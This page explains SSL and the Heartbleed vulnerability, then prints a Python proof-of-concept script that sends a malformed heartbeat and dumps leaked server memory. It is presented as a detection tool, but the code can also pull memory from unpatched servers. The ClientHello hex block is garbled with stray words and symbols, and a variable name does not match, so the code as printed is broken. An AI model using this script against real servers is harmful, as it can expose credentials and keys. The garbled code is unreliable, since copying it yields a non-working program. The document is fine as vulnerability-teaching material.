What is SSL?
SSL is a widely used encryption technology that protects the private information users transmit over the Internet. Once a website uses it, third parties cannot read the communication between you and the website. Behind the scenes, data encrypted with SSL can only be decrypted by the intended recipient.
SSL was first introduced by Netscape in 1994 and has been adopted by all major browsers since the 1990s.
What is the "Heartbleed" vulnerability?
The SSL standard includes a heartbeat option that lets the computer at one end of an SSL connection send a brief message to confirm that the computer at the other end is still online, and get a reply. Researchers found that a maliciously crafted heartbeat message could trick the computer at the other end into divulging confidential information: the affected computer can be deceived into sending back contents of the server's memory. The bug is in OpenSSL's implementation of the heartbeat option and is tracked as CVE-2014-0160.
Who found out about this problem?
The vulnerability was discovered independently by researchers at Codenomicon and at Google Security. To minimize the impact, the researchers worked with the OpenSSL team and other key insiders to prepare a fix before the issue was made public.
Python script to detect the OpenSSL Heartbleed vulnerability
#!/usr/bin/python
# Quick and dirty demonstration of cve-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The Author disclaims copyright to this source code.
import re
import select
import socket
import struct
import sys
import time
from optparse import OptionParser
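# Command-line interface: one positional argument (the server to test) and an
# optional TCP port.  The listing's capitalised keywords and padded string
# literals are extraction damage; this is the same parser in valid Python.
options = OptionParser(
    usage='%prog server [options]',
    description='Test for SSL heartbeat vulnerability (CVE-2014-0160)',
)
options.add_option(
    '-p', '--port', type='int', default=443,
    help='TCP port to test (default: 443)',
)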
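def h2bin(x):
    """Convert a hex dump string into the raw bytes it spells out.

    Spaces and newlines are removed before decoding, so the input may be laid
    out as rows of two-digit hex values.  Any other non-hex character raises
    ValueError.
    """
    # bytearray.fromhex stands in for the Python-2-only str.decode('hex'), so
    # the helper behaves the same on Python 2.7 and Python 3.
    return bytes(bytearray.fromhex(x.replace(' ', '').replace('\n', '')))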
# TLS ClientHello record that main() sends to start the handshake before the
# heartbeat probe.
# NOTE(review): the hex rows below were corrupted when this page was produced
# (stray words, commas and parentheses inside the dump, and a damaged opening
# triple quote), so h2bin() cannot decode this literal as shown.  Do not guess
# at the missing bytes -- restore the block from a trusted copy of the script
# named in the file header before using it.
Hello = H2bin ("'
03 02 53 D8 DC
5b 9d 9b, 0b BC 0c BC 2b A8 (CF)
bd 00 CC 0a (9f) D4 de, Geneva
C0 C0 0a C0 C0 21 00 39 00 38 00 88
C0 0f c0 c0 c0 c0 1c (XX)
C0 1b C0 0d c0 0a c0 c0 09
C0 1f C0 1e 00 99 00 45 00 44
C0 0e C0 2f xx c0 c0 c0 0c
C0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 04 of the FF at the same
0a, 0e, 0d, 00 19
0b 0c 00 (0a 00 16 00 17 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
0f 00 10 00 11 00 23 00 00
0f 00 01 01
''')
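# Heartbeat request record used as the probe.
# Record header: content type 0x18 (heartbeat), version 0x0302, length 3.
# Body: message type 0x01 (request) and a declared payload length of 0x4000,
# with no payload bytes actually present.  The check in hit_hb() is whether
# the server answers with more than those 3 bytes.
# The stray ')' in the listing's first row is extraction damage and is removed
# here so the literal decodes.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')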
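def hexdump(s):
    """Print *s* as a hex dump, 16 bytes per row, followed by a blank line.

    Each row shows the offset, the bytes in hex, and the same bytes as text
    with anything outside printable ASCII (32..126) replaced by '.'.
    """
    for b in range(0, len(s), 16):
        # bytearray yields integers on both Python 2 and 3, which avoids the
        # ord() calls that only work on Python 2 strings.
        row = bytearray(s[b:b + 16])
        hxdat = ' '.join('%02x' % c for c in row)
        pdat = ''.join(chr(c) if 32 <= c <= 126 else '.' for c in row)
        print('%04x: %-48s %s' % (b, hxdat, pdat))
    print('')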
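def recvall(s, length, timeout=5):
    """Read exactly *length* bytes from socket *s*.

    Returns the bytes read, or None if the peer closes the connection or
    *timeout* seconds pass before *length* bytes have arrived.
    """
    endtime = time.time() + timeout
    chunks = []
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        # Wait only for the time that is left.  The listing waited a fixed
        # 5 seconds per select() call, which let a short *timeout* overrun.
        readable, _, _ = select.select([s], [], [], rtime)
        if s in readable:
            data = s.recv(remain)
            # An empty read means the peer closed the connection.
            if not data:
                return None
            chunks.append(data)
            remain -= len(data)
    return b''.join(chunks)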
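def recvmsg(s):
    """Read one TLS record from socket *s*.

    Returns a (content_type, version, payload) tuple, or (None, None, None)
    if the header or the payload could not be read in full.  recvall() returns
    None on a timeout as well as on a closed connection, so the "EOF" messages
    below cover both cases.
    """
    hdr = recvall(s, 5)
    if hdr is None:
        print('Unexpected EOF receiving record header - server closed connection')
        return None, None, None
    # 5-byte record header, big-endian: content type (1 byte), version
    # (2 bytes), payload length (2 bytes).  All three are unsigned; the
    # lower-cased format in the listing would have read them as signed.
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print('Unexpected EOF receiving record payload - server closed connection')
        return None, None, None
    print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
    return typ, ver, pay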
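def hit_hb(s):
    """Send the heartbeat probe on *s* and report how the server answers.

    Returns True if a heartbeat record (content type 24) comes back, and False
    if the connection ends or the server answers with an alert (type 21).
    The "vulnerable" verdict is printed, not returned: it is given when the
    heartbeat response carries more than the 3 bytes the request contained.

    A "likely not vulnerable" result only means this one probe, which uses a
    fixed record version (see ``hb``), was not answered; confirm it by
    checking the OpenSSL build on the server.
    """
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print('No heartbeat response received, server likely not vulnerable')
            return False

        if typ == 24:
            print('Received heartbeat response:')
            # NOTE: on an affected server this dump is raw process memory and
            # may hold credentials or key material; treat the output as
            # sensitive.
            hexdump(pay)
            if len(pay) > 3:
                print('WARNING: server returned more data than it should - server is vulnerable!')
            else:
                print('Server processed malformed heartbeat, but did not return any extra data.')
            return True

        if typ == 21:
            print('Received alert:')
            hexdump(pay)
            print('Server returned error, likely not vulnerable')
            return False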
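def main():
    """Connect to the server named on the command line and run the test.

    Sends the ClientHello, reads records until the server's hello-done
    handshake message arrives, then sends the heartbeat probe and lets
    hit_hb() print the verdict.  Prints usage and returns if no server
    argument was given.
    """
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # try/finally so the socket is closed on every exit path; the listing
    # never closed it.
    try:
        print('Connecting...')
        sys.stdout.flush()
        s.connect((args[0], opts.port))
        print('Sending Client Hello...')
        sys.stdout.flush()
        # sendall() retries short writes, which a bare send() does not.
        s.sendall(hello)
        print('Waiting for Server Hello...')
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print('Server closed connection without sending Server Hello.')
                return
            # Look for the server hello done message: a handshake record
            # (content type 22) whose first byte is 0x0E.  `pay` is checked
            # first because an empty record would otherwise raise IndexError.
            # Only the first message of each record is inspected.
            if typ == 22 and pay and bytearray(pay[:1])[0] == 0x0E:
                break

        print('Sending heartbeat request...')
        sys.stdout.flush()
        # hit_hb() sends the probe again itself, as in the listing.
        s.sendall(hb)
        hit_hb(s)
    finally:
        s.close()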
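# Run the test only when the file is executed as a script, not on import.
if __name__ == '__main__':
    main()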